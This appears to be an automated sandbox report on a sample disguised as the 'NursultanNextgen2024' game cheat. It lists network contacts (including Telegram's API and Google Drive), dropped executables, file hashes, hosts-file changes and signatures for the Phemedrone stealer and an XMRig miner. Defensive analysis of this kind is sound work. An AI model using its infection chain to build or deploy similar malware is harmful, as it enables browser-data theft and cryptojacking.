C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 11.248.199.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 172.253.115.120:443 | csi.gstatic.com | tcp |
| US | 172.253.115.120:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.115.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.1.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 100.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
Files
\??\pipe\crashpad_3896_USVQKOTDKSEYCDUY
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 777c895642904706c1c119759374a3e0 |
| SHA1 | 9fdd6f9733c5ee71b84a74ffdefee91ac9780d09 |
| SHA256 | ad81b42ca4830111f4b13ef2f29b91f1e7ace51ddab9056dfd84c64e68d17197 |
| SHA512 | ea49dc18b8219f8db42e3831703ae50aa0fffd80c1a0e1fa6a99b377dd1014842ebd8427b9f91b705b65b8f6b9543ee285492ce3647414d3bfadc939556c81dc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5af390c5172df390515185bf0d2c6712 |
| SHA1 | f18acde01b47480906da76c92eb2896ff062dad7 |
| SHA256 | e8211418ce96d9915c9cea6b3c4efb065aa69b5bb8231854e872196058a6b47b |
| SHA512 | 56cb1bb0840d00127c959ae9b07b4bcb68066765da4d8043b8b69f6b22738f7d9364a0990dcfddf5c3ae9a09f03672aed7a491831984f65e96365580c7143a03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0cc78e0c985d1a138db6cd1039019fba |
| SHA1 | 394a729c3dfc4a2a8ba7d508342f3681fd530169 |
| SHA256 | 78a96e4c865aad34d37d8711dfdf165760ebf7e35e2f5cf454e43e1da3fef2c7 |
| SHA512 | 29ba1bbdfc4618c3c3928f098ebb08a82ac67ab8558f79b96e5b18fe4b17f997967e0b4e239ff9626379994cea5f32561d1fd7991191ccf21b63936f2156dfa8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | fca679ee9ee6b7bb02d9661879f4b418 |
| SHA1 | f14ca76fb3f7bb985f01ce9ebb867ecca854d6c9 |
| SHA256 | 48b908a62f870be931962a754d35d9bba569b16edd1c77b0902065a9eb4cb03b |
| SHA512 | 59de552d499e94069cfc422e6ec8da4fabe7cae6f9a4fb856b17955d94efca21e45e15d37d7c3bfa6c5e2931d30fd2eff785bee6f6ed049ebd83b5f2d13dacec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1e23e5b18d755d8133c2332e156d81c2 |
| SHA1 | 8ddf6934bcdfb8e0ce11c50b79bac75f17aa1916 |
| SHA256 | 09be04245a15a0381820aa9f54142b45ac9c5d8bdc25bffeb36eed67dc2444fb |
| SHA512 | e6299e81dc37741dc64b8ee216a355e784c3eeb540cabadc12ac492e7b7f6ab19f91ffb1a8b4ea7a80ebc16e91507bb24b981d4a821601d09b6aedbb9cfdd4d0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 76ee6a6423b5a19e684bc57a7ef36068 |
| SHA1 | 01c9b1d55afe6973040a0f3b47917a87e1afb9d2 |
| SHA256 | ac49b75ada996cfb55c53728dcc076bb2a4c762d24f137f2009e4a6ee47a66d8 |
| SHA512 | a2b1aad4d6791c447056614c7afea6dd64fec4996025881b5201b9159979f529614ba344a784bba20ff97afa88897726e582d1b29be0c2a4a8fa18e90fb3cb33 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 81461675afeb386168f85d2c4ff14cf1 |
| SHA1 | 8e8a37836cebccf98ea170a025ad09780870eb63 |
| SHA256 | 3d6c94844706cb725bc72225b8e4018236c05086ceef449270e6b58361ecc584 |
| SHA512 | 9c8a7b2858058d15e8c19503f33ba65eaa0ca1540c96f561ab1c8f3b0f6ce9f48eca60d9fd5fb92a170ae69265a46e4b82a9de2ab8cd4c0b7b3d1a4cd99dd1c2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
| MD5 | 97f07e182259f3e5f7cf67865bb1d8f0 |
| SHA1 | 78c49303cb2a9121087a45770389ca1da03cbcdf |
| SHA256 | c3a70f23a2cf331852a818d3f2a0cf7f048753c9b47aa4e7f0fee234c46b226c |
| SHA512 | 10056ad3a71ee806a8d8aff04d513a079568bf11799016f76f27c4255be2141a4c2d99c1f46bbfde9c99ba0f8b44e780a92b59f514d3cc1c248ead915c31b5dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e686f6d8e2ccae5626e8e9c2504360ef |
| SHA1 | 5274132cd89ca174b4d61efd596d5e95edfdb95c |
| SHA256 | 23fcb609ef389d1eed440cd9136757553bc94024b4cc197272833fe289bc78bf |
| SHA512 | 6083ca2edeb75b9d7e5dd8255f556bba1c88191804af8f6b0d6a409bf5343cf4fc8715b99a1572195d208ddc78061b68c6209351647cfa5b77828fca0ae57cf7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 47ee741e8141b49a3360a46f7cb427fd |
| SHA1 | ff6416a38f8f624e2b4e634e0a2ed117178cfa03 |
| SHA256 | 7f9e3c1774b9271a001c67e7efa69135b0d2641e4c214c84a7db3586d78344ba |
| SHA512 | 7eb19b5582fb01b02dd818bd60984efdb9365e57b79f20c704df02484fe41a44ce454a440ba8b9258565485978855b5962ae829e875e84335f9df8ca42264e85 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 706d2d8d879a306e11e4f166ed76250d |
| SHA1 | 1486fc4395dcbdadc7c9ccbf27fd65cc44f81b11 |
| SHA256 | cca0807e81b32b2daf072518b63737a825bd24c1513f7ca6387eafe1e434fb69 |
| SHA512 | 2114ea1f26bf1d8edecdc126d801bf0ff305157e89e3d2f89a6a6cf91f9fb5c3cbbe30dd91cacaee6737990810133f4caf1625fd92a9c1d59398b9c7c81d7dda |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 95b380ff0eaa6797f86b9bbb25a61396 |
| SHA1 | cad3154bccd6aa2a1ab73d3bb92dde796b052ea3 |
| SHA256 | 0c9bc173c6af36f916657f2b26d8bfdcb886b340618f7d7bb7466a544b7d3953 |
| SHA512 | 8a2d307ee3b17157600aabf3caf8c14d26bd671e332f0c1ed1c9dfe6623c2da4b0c3a492ecd118bcc0f4d2892224cf7c0ba6fc6d1425e715149f4c6807823474 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6467057b4c3f3556ec151f4446687621 |
| SHA1 | dd8d7b051afa8ccf0e270f57e430cd2d216564f9 |
| SHA256 | 9c1fb52d5f46e426503c54a86c5088390dac8323bbc369544ec6b43fcb876c0b |
| SHA512 | bf441ef873e9e2296ff9811ac189d14afe4877e59df85fd009e42a2b59f56bf62450ea26c567c67393b89a4b7f6518fa2ff84f3a78513460a2d43e6ead1a85db |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 608cfc17ce5c5104fbbc71830caac58a |
| SHA1 | 3128a9ce1b7a1a1f1520f98c5bf2901b6d8f8e5a |
| SHA256 | bea8bdd7b222d4c7f67de91df169355a444fbf2c9a63f5deb28c2e4e888806bd |
| SHA512 | 02295c8f4b9d3a25b2754daac86df3251598d1042f38ca0b39de7daffb737e289c0383e74ed687a3582d5951c9d5e0a5393fb0157913c625ada92f4800b3a0a2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5931b5.TMP
| MD5 | a06f6b7a847f4a0d8bc53cb62850d2bc |
| SHA1 | 44cca131cfde1cae862ddfead9f563b84f564702 |
| SHA256 | 76632dc5b68a568c97cb1d58489670317581ca3fd62581f3eaae3a1e233bb40b |
| SHA512 | fbf6891bacbdd5744d19cee8eb1303d5b09aab3f4ab22ef776e74a5369702caac7e3a7a70a54f8d7c8d59ffb4b3c8d213dadb89ba44c5993360f8391a108a9e4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 99f17e53ffa6dccd213bbbab7bab994a |
| SHA1 | 27aa57850b80b49bfe3474046aabbdb7cf046b31 |
| SHA256 | ba09eeefbf2c17f13ea9780d601513dede0766d408cbe890f8453392644a63b2 |
| SHA512 | 9611f46f7fa599b994975446b4f933f0b32ede971fae8152e37039376f886c05bfc435390a69c46a6a6f6efdfda925ac9f746a9a8b028cd2892ec0c651f68bdf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 6bd5edefde717757db6ec671229d931b |
| SHA1 | b4ec04b96b224930a88df4473d0068b7a4ff1f5c |
| SHA256 | 01b0cbfbe3e4f8d1822e64514717b4aed1511cbd00b7181ff5a0dce7a21df717 |
| SHA512 | bb4166c6b4b404aceeadb6ff843549c79029b669bfada65bdf65a48d7ffaa4244bbdc07d6706e4b2399b8360a5afad3e865d56f0f7e61a7480d9324dc74d8679 |
C:\Users\Admin\Desktop\NursultanNextgen2024\kdotlbBcbF.bat
| MD5 | 988dfb6afa81abbe75df1dada54b231c |
| SHA1 | ce6941a0a8fdb5e00c1037b0f7657bcd7a63f830 |
| SHA256 | 968bd350c1c19099f54691d26ce0b80649044f3fa5108bc665b7234e1b758dd5 |
| SHA512 | 04c511d46351cdfc0ac3a6ba0e574a4d177ab9d55101c020ec8e1eca3049a87f4568bf460e13cf156970978c303c18c465a583efdafdd15a3455c492b5da7c11 |
memory/1948-278-0x00000149FC400000-0x00000149FC422000-memory.dmp
memory/1948-281-0x00000149FC6D0000-0x00000149FC746000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_504ku5as.uth.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 58936da688ac2ee8963a953badb817e0 |
| SHA1 | 1ca006eb71816a6bea2b03da30b964687f5a0e9e |
| SHA256 | bec1e6fafd87f872d64555932fb483a2998f8cbc7080455b048ec7c7968dac92 |
| SHA512 | 07e965ddb52d499d5250076e1810b0d179bade395a0768dc7eb6f08a8f1fcd796cfea5a1caa0abc5ac9deaab2a704cbbefa77aa4e4efebf7e691e910a7b08a5f |
memory/4208-494-0x000001F1510C0000-0x000001F1510E2000-memory.dmp
memory/4208-475-0x000001F1510C0000-0x000001F1510EA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 131c576779f7483370c395c256910304 |
| SHA1 | ee920fd35c2eaa9d62f96ee8986c42d6a96b26f2 |
| SHA256 | 9399f7d299d2680edaf9b7517ba20399e6c89536fc2df9b6a677886dc957a8b4 |
| SHA512 | 73a493787c68c997f6c87b3e361aabdc52c83686582cee61937cfa795bb8a8fcf67dbec69133e1452363b9db87e6c538d76884cf04fc0b1c5016385f6d613f58 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | af9a9f5c919489eb0dd19d944ad35815 |
| SHA1 | 3512094987b851caba495b4c79a69d406622477e |
| SHA256 | 406ea3ba9f3b594c2496a30ad4ad6b55948480cb5ab099eb40e670e33d25ed70 |
| SHA512 | 1dd47ac314248687e3698568f4efab0e95f3f9a35938a217bd5f6fd268a47bc062acd2e9b4a32aa05072354ac2435fce0f4ad9117fce696d8f9455ee5f717384 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2c0313f14538ef9f1053da010f946582 |
| SHA1 | cecc0041e81e06cd4678ca57c3a6d78b0465ecbf |
| SHA256 | 7a237c8f64f6fb466573a949dbdb8bad656b3b8156ca25e2fb9f0f8e7d3dd175 |
| SHA512 | 3067ea40e21f1ec6dc355bfe6eb17b9a3052d36ac64a8d97f0106ad76b3bae8e623c3f2343afe06ffa3a71c29b23e4ba2427a5f9e28242b784981efae5888845 |
C:\Users\Admin\AppData\Local\Temp\Cache.rar
| MD5 | 6282b4c6aca3a1c55af6d1ed91d3c932 |
| SHA1 | cfb5bf824bbfd3ef9b49ef1f65c98f1f88c3a974 |
| SHA256 | a29cc0c6f3c244c8d257fa1ea5c10c463b4e26ef0f0ca010f0a917d7da69aee1 |
| SHA512 | 92ac2ec23c1dd38b8b2a76ab237e30a0dd873d23aa2aaf7856089d451a95beb632b1417deea28fb6fb98fcc025afc3efcd9679e8c2384c4eefd5abbe27de28d3 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
| MD5 | 643a8e965f3f1331c2902a2a451c5200 |
| SHA1 | 4a92181dc431a42e9a0c4aedb9df7c5b1b572173 |
| SHA256 | 61c29cf71d338ee070804f4ec0e60f93dd2056840c95c9497bb03cf81a590ad5 |
| SHA512 | 194f9c946d4d06bbe8a89999716024b79cd66df9da2c11e503cee216004e44fad01317229a84618a0cc406deb40ec7e23e1e53e23c426b2e6f2b3107e8f1baf1 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
| MD5 | acc0ec089c7623d1460d205a9e45a1d9 |
| SHA1 | 7abdb88df37e63cdaf4b6c99d2ec9c56d48815f8 |
| SHA256 | 169ab660aad03e63b1db2619e471ed8679a6975c7d1d23f639b1b052a62c80fc |
| SHA512 | 3201636fc8808dcf6683125555365dd0cbef25dfd5fe934c090eaf120107cee53a762a9ee0b2946f4feb1a74a7ee36a1daaae3187a15c278a2b00fc27b64c7e4 |
memory/2940-597-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2940-598-0x00000000050C0000-0x0000000005126000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 9eae63c7a967fc314dd311d9f46a45b7 |
| SHA1 | caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf |
| SHA256 | 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d |
| SHA512 | bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
| MD5 | f7ad01b216d7d7118fe161284c3b3408 |
| SHA1 | cdf5bbc3a915156d715d79ba4f5a7daef069afc6 |
| SHA256 | 3462de445f10dbdd049b77bd7619d4b52fb1f91fbb56ebba1865b756e22b10e6 |
| SHA512 | f9ebf74fa197b8bdeed2db95d73862f54a2e71b84f32778c2abe3cf719f002354d469ca4b8d9b23c1d23d647f5a5733e2d0f8e0bf032f93dad89deec5f6e898b |
memory/2940-657-0x0000000005CE0000-0x0000000005D72000-memory.dmp
memory/2940-658-0x0000000006C60000-0x000000000715E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9cfc3dc0387083370005ecfe95dc6899 |
| SHA1 | fe818f52e7d4e022e0b3d45829d0f2f294da7842 |
| SHA256 | 13b8ab6d0f06e2259acc0331801b71a3d15281234da16117d0e4b70c92073df3 |
| SHA512 | ed3dc742a0a16c97035f9948987880a7d17482ca2c0bba5ce489f8eaa7377cae7ead1d70ddace9bdbca9096a5e5edff55458eddbd7144f12b3667a2c648c497e |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 747d7ddd27f695f5e07df8ff9bc44e28 |
| SHA1 | c33048412255744c3de6292238eae196791be25e |
| SHA256 | 8dac7d9b38f2811c76652717c7f93c2a6390f031149ed850ae9ddb7dedcfca55 |
| SHA512 | ca85efa05980bba8ced81cb41a66e05821a2a55382142bffd27e8945a34d0ec89a6e221f0f5e381c877adc8d639863c9c837b74401f8096af5e9417580766ffa |
memory/2456-730-0x00000205427C0000-0x00000205427DC000-memory.dmp
memory/2456-736-0x0000020542F00000-0x0000020542FB9000-memory.dmp
memory/2456-769-0x00000205427E0000-0x00000205427EA000-memory.dmp
memory/4832-859-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-867-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-863-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-862-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-861-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-860-0x0000000140000000-0x000000014000D000-memory.dmp
memory/400-870-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-868-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-872-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-875-0x000002A041820000-0x000002A041840000-memory.dmp
memory/400-876-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-874-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-871-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-869-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-873-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-878-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-879-0x0000000140000000-0x0000000140848000-memory.dmp
memory/400-877-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
133s
Max time network
143s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (3) — копия"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240611-en
Max time kernel
129s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\049a3049a5ac8631a6c5f367b7d824fc0d8de39b
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
129s
Max time network
138s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1292 wrote to memory of 1684 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1292 wrote to memory of 1684 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1292 wrote to memory of 1684 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_opengl.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_opengl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
124s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\SAPIWrapper_x64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\jemalloc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
131s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240611-en
Max time kernel
122s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl_opengl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 25.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
150s
Max time network
118s
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\windows\powershell.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| N/A | N/A | C:\ProgramData\windows\powershell.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
